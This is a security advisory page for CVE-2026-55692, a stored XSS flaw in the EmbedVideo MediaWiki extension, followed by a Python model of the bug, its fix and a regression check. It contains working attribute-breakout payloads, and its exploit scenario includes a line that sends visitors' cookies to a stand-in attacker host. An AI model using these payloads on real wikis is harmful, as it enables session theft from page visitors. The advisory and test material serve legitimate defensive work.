
EmbedVideo Extension CVE-2026-55692

Severity: HIGH, 7.5 (CVSS 3.1, GitHub Advisory)
Weakness: Cross-site Scripting (XSS) (CWE-79)
Published: 2026-06-19
Repository: https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo
Advisory: GHSA-5c7p-g73q-rpg5

Severity by source

GitHub Advisory (primary): 7.5 HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

vuln.today AI: 6.4 MEDIUM
Rationale: the wiki edit endpoint is network-reachable (AV:N, AC:L); exploitation requires edit permission, so PR:L rather than PR:N; the injected autofocus handler removes the need for victim interaction (UI:N); the XSS executes in the browser origin, so S:C with C:L/I:L.
CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from GitHub Advisory.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

Source Code Evidence Fetched: Jun 19, 2026 23:36 (vuln.today)
Analysis Generated: Jun 19, 2026 23:36 (vuln.today)
CVE Published: Jun 19, 2026 21:41 (github-advisory), rated HIGH 7.5

Description (GitHub Advisory)

Summary

With $wgEmbedVideoRequireConsent enabled (the default), the URLs for videos are stored in a JSON-ified data attribute, data-mw-iframeconfig. When given a malformed URL or ID, the data-mw-iframeconfig attribute can be escaped via single quotes, allowing for HTML/JavaScript injection.

Details

The sprintf call here adds the iframe config encoded as JSON. When given a malicious URL or ID containing a single quote, the $this->getUrl() call returns an unescaped payload that terminates the data-mw-iframeconfig attribute and allows for injecting attributes, including event handlers, into the figure element. The ID regex for the archiveorg service and the URL regexes for the wistia and sharepoint services allow single quotes to be introduced.

PoC

A couple of examples across services:

Input:
<embedvideo service="archiveorg" id="x' onmouseover='alert(document.domain)' data-x='"></embedvideo>

Renders:
<figure class="embedvideo" data-service="archiveorg" data-mw-iframeconfig="{&quot;src&quot;:&quot;//archive.org/embed/x" onmouseover="alert(document.domain)" data-x="?autoplay=1&quot;}" style="width:640px">
<div class="embedvideo-wrapper" style="height:493px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>

Input:
{{#ev:wistia|https://wistia.com/medias/x'onmouseover='alert(document.domain)'}}

Renders:
<figure class="embedvideo" data-service="wistia" data-mw-iframeconfig="{&quot;src&quot;:&quot;//fast.wistia.net/embed/iframe/x" onmouseover="alert(document.domain)" ?autoplay="1&quot;}'" style="width:640px">
<div class="embedvideo-wrapper" style="height:360px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>

Input:
{{#ev:sharepoint|https://a.sharepoint.com/sites/x'onmouseover='alert(document.domain)'.aspx}}

Impact

Under the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via a parameter. It requires no interaction (it auto-fires via autofocus) and executes in the wiki origin for every visitor to the page.

Analysis (AI)

Stored cross-site scripting in the StarCitizenWiki EmbedVideo MediaWiki extension (versions <= 4.0.0) allows any user with page-edit rights to inject arbitrary JavaScript into the data-mw-iframeconfig attribute by supplying a malformed URL or ID containing single quotes for the archiveorg, wistia, or sharepoint services. The flaw is present under the default $wgEmbedVideoRequireConsent=true configuration and executes in the wiki origin for every visitor that loads the affected page, and publicly available exploit code exists in the GHSA advisory.


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Obtain wiki edit access
Delivery: Craft embedvideo tag with single-quote breakout in archiveorg/wistia/sharepoint parameter
Exploit: Save page with poisoned data-mw-iframeconfig attribute
Execution: Victim loads rendered page
Persist: Autofocus handler fires injected JavaScript
Impact: Script executes in wiki origin, exfiltrating session or acting as victim

Vulnerability Assessment (AI)

Exploitation: The extension must be installed at version 4.0.0 or earlier with the default $wgEmbedVideoRequireConsent=true setting; the attacker must hold edit rights on at least one page on the target wiki (the CVSS vector states PR:N, but the description explicitly requires the ability to edit a page); the payload must be delivered through one of the three services whose input regexes allow a single quote, namely archiveorg (id parameter), wistia (url), or sharepoint (url); and exploitation succeeds only once a victim loads the rendered page in a browser, though no further user interaction is required because the injected autofocus handler auto-fires. Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N yields 7.5, but the published vector is internally inconsistent with the described attack: exploitation requires permission to edit a wiki page, so PR:N is optimistic and PR:L is more honest, while a stored XSS typically warrants S:C with C:L/I:L rather than C:H/I:N. …

Exploit Scenario: A contributor on a wiki running EmbedVideo <= 4.0.0 edits any article and inserts `<embedvideo service="archiveorg" id="x' onfocus='fetch("//attacker/?c="+document.cookie)' autofocus='"></embedvideo>`, which is saved and rendered for every subsequent viewer. When victims load the page, their browser parses the injected onfocus and autofocus attributes on the figure element, executing the attacker's JavaScript in the wiki origin without any victim interaction; the GHSA-published PoC demonstrates the same primitive against the wistia and sharepoint services as well.

Remediation: Vendor-released patch 4.1.0. Upgrade the Composer package starcitizenwiki/embedvideo to version 4.1.0 or later, which replaces the sprintf-based attribute assembly with a TemplateParser plus Html::element/Html::rawElement calls that perform proper HTML attribute encoding (commit 370156335b325bb81d14d89edf0a1f2643d50a84). …
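The Details section and the Remediation paragraph describe the same root cause from two sides: a URL is dropped into a single-quoted data-mw-iframeconfig attribute by string formatting without attribute-context encoding, and the fix moves attribute assembly to MediaWiki's Html helpers. The following Python script is an added illustration, not code from the EmbedVideo extension (which is PHP) or from the advisory. It models the assumed bug shape (config JSON with only double quotes entity-encoded, placed in a single-quoted attribute), the hardened form (every quote and angle bracket encoded), and a regression check a reviewer can run over rendered markup. SERVICE_EMBED, render_vulnerable, render_fixed and attribute_intact are hypothetical names; the embed URL templates are simplified stand-ins; the sample ID is the advisory's own archive.org PoC input.

```python
import html
import json
from html.parser import HTMLParser

# Constructed stand-ins for per-service embed URL templates (simplified;
# the real extension derives these from its service definitions).
SERVICE_EMBED = {
    "archiveorg": "//archive.org/embed/{id}?autoplay=1",
    "wistia": "//fast.wistia.net/embed/iframe/{id}?autoplay=1",
}

# Sample input taken from the advisory's archive.org PoC.
POC_ID = "x' onmouseover='alert(document.domain)' data-x='"


def iframe_config(service, video_id):
    """The JSON config the consent wrapper later reads (only 'src' modelled)."""
    return {"src": SERVICE_EMBED[service].format(id=video_id)}


def render_vulnerable(service, video_id):
    """Assumed shape of the pre-4.1.0 defect: sprintf-style assembly of a
    single-quoted attribute whose value has only double quotes entity-encoded,
    so a single quote inside the URL terminates the attribute."""
    config = json.dumps(iframe_config(service, video_id)).replace('"', "&quot;")
    return (
        "<figure class='embedvideo' data-service='%s' data-mw-iframeconfig='%s'>"
        "</figure>" % (service, config)
    )


def render_fixed(service, video_id):
    """Attribute-context encoding of the complete value: html.escape(quote=True)
    encodes &, <, >, double and single quotes, so no byte of the URL can end
    the attribute (the same guarantee MediaWiki's Html::element provides)."""
    config = html.escape(json.dumps(iframe_config(service, video_id)), quote=True)
    return (
        '<figure class="embedvideo" data-service="%s" data-mw-iframeconfig="%s">'
        "</figure>" % (html.escape(service, quote=True), config)
    )


class _FigureAttrs(HTMLParser):
    """Collects the attributes of the first <figure> as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "figure" and self.attrs is None:
            self.attrs = dict(attrs)


def figure_attributes(markup):
    parser = _FigureAttrs()
    parser.feed(markup)
    return parser.attrs or {}


EXPECTED_ATTRS = {"class", "data-service", "data-mw-iframeconfig"}


def attribute_intact(markup, service, video_id):
    """Regression check: the figure carries only the expected attributes and
    its config round-trips to JSON with the embed URL unchanged."""
    attrs = figure_attributes(markup)
    if set(attrs) != EXPECTED_ATTRS:
        return False
    try:
        config = json.loads(attrs["data-mw-iframeconfig"])
    except ValueError:
        return False
    return config == iframe_config(service, video_id)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = render("archiveorg", POC_ID)
        print(name, sorted(figure_attributes(out)), attribute_intact(out, "archiveorg", POC_ID))
```

Run stand-alone, the vulnerable renderer yields a figure with extra onmouseover and data-x attributes, while the fixed renderer yields exactly the three expected attributes and the hostile string survives only as inert text inside the JSON value. The check is deliberately strict about the attribute set rather than looking for known handler names, so it also catches breakouts that add attributes other than event handlers.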

Recommended Action (AI)

Within 24 hours: Identify all instances running EmbedVideo extension version 4.0.0 or earlier. …



CVE-2026-55692 vulnerability details – vuln.today
